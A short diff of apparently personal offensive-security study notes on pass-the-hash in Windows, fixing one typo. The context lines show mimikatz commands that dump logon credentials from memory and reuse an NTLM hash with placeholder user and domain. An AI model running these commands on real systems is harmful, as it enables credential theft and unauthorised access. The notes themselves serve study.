OmarMiniesy/Notes/Offensive Security/Windows Security/Pass the Hash.md

 mimikatz # sekurlsa::logonpasswords
 ```

-Running the `pth`, pass the hash, argument with the obtain credentials and the domain:
+Running the `pth`, pass the hash, argument with the obtained credentials and the domain:
 ```
 mimikatz # sekurlsa::pth /user:<username> /ntlm:<hash> /domain:<domain>
 ```